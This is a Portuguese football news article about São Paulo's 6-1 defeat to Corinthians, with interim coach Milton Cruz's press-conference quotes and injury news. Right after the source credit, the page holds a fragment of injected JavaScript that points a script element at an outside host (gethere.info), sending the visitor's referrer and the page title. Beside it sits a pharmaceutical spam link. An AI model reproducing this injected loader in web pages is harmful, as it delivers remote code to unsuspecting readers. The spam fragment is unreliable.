Noticias

“Indignado”

“Foi um jogo atípico, nada deu certo. Estávamos bem no jogo, mas depois que tomamos o primeiro gol, demos uma bobeada. Tivemos dificuldade na bola parada. Esse foi o tema do jogo. Faltou a liderança do Ceni, o Ganso que sentiu a lesão e o Luis Fabiano que teve um incômodo na perna”. As palavras do técnico interino Milton Cruz, durante a coletiva de imprensa, resumem o clássico deste domingo (22) contra o Corinthians (6 x 1) pela 36ª rodada do Campeonato Brasileiro.

Diante de um adversário que soube aproveitar as oportunidades, o São Paulo não conseguiu repetir a boa atuação da última quinta-feira (19) – na goleada sobre o Atlético-MG (4 x 2) – e acabou derrotado. “O São Paulo é um time vitorioso. Essas coisas acontecem, uma derrota como essa acontece, mas é claro que não gostaria de passar por isso”, acrescentou o comandante.

Para encarar os corintianos neste final de semana, Milton Cruz não pôde contar com o atacante Alexandre Pato (questões contratuais). Além do camisa 11, o goleiro Rogério Ceni (ruptura do ligamento tíbio-fibular do pé direito), o zagueiro Breno (artroscopia no joelho direito) e o defensor Luiz Eduardo (artroscopia no joelho esquerdo) também estavam fora de combate. O trio segue entregue aos cuidados do REFFIS, realizando as atividades sempre em período integral (manhã e tarde), para poder ficar novamente à disposição.

De última hora, Renan Ribeiro, com uma tendinite no posterior da coxa esquerda, e Paulo Henrique Ganso, com um desconforto no músculo adutor da coxa direita, também desfalcaram o Tricolor, que desta forma começou a partida com Denis; Bruno, Rodrigo Caio, Lucão e Carlinhos; Hudson, Thiago Mendes e Wesley; Michel Bastos, Rogério e Alan Kardec.

Quando a bola rolou, o Tricolor até assustou primeiro e procurou o campo de ataque, mas os donos da casa souberam envolver os visitantes para levarem a melhor. “A gente fica indignado, não só eu como o jogador no vestiário. Os jogadores tentaram buscar o resultado, tivemos um jogo na quinta-feira que talvez tenha desgastado o grupo. O time começou bem, faltou a liderança do Rogério Ceni para orientar. O Ganso é um líder técnico. Essas coisas são difíceis de digerir, mas o futebol prega essas frustrações”, finalizou o treinador interino.

Fonte: SiteOficials.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; to order cheat generic pills online – http://www.duncanmazda.net/uncategorized/to-order-cheat-generic-pills-online/ pills

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Noticias

Mais em Noticias

Jucilei crê em permanência no São Paulo e lamenta “ano de chacota”

saopauloadmin20 de novembro de 2017

Petros e Jucilei: donos do meio de campo tricolor

saopauloadmin14 de novembro de 2017

Dorival analisa empate e elogia torcida são-paulina

saopauloadmin12 de novembro de 2017

Kaká ainda não definiu futuro e pode ter se despedido do futebol no último sábado

saopauloadmin11 de novembro de 2017

Hernanes falou sobre o bom momento e brinca sobre jogos do SP: “Uns 50 iam para o hospital no fim”

saopauloadmin7 de novembro de 2017

Meta, consistência e ambiente: elenco avalia momento tricolor

saopauloadmin5 de novembro de 2017

7 empresas negociam com o São Paulo para estampar camisa em 2018

saopauloadmin2 de novembro de 2017

‘Superprofeta’!

saopauloadmin30 de outubro de 2017

CHANCELA DA FIFA TEM IMPORTÂNCIA ZERO PARA O TORCEDOR QUE VIVEU OS MUNDIAIS

saopauloadmin27 de outubro de 2017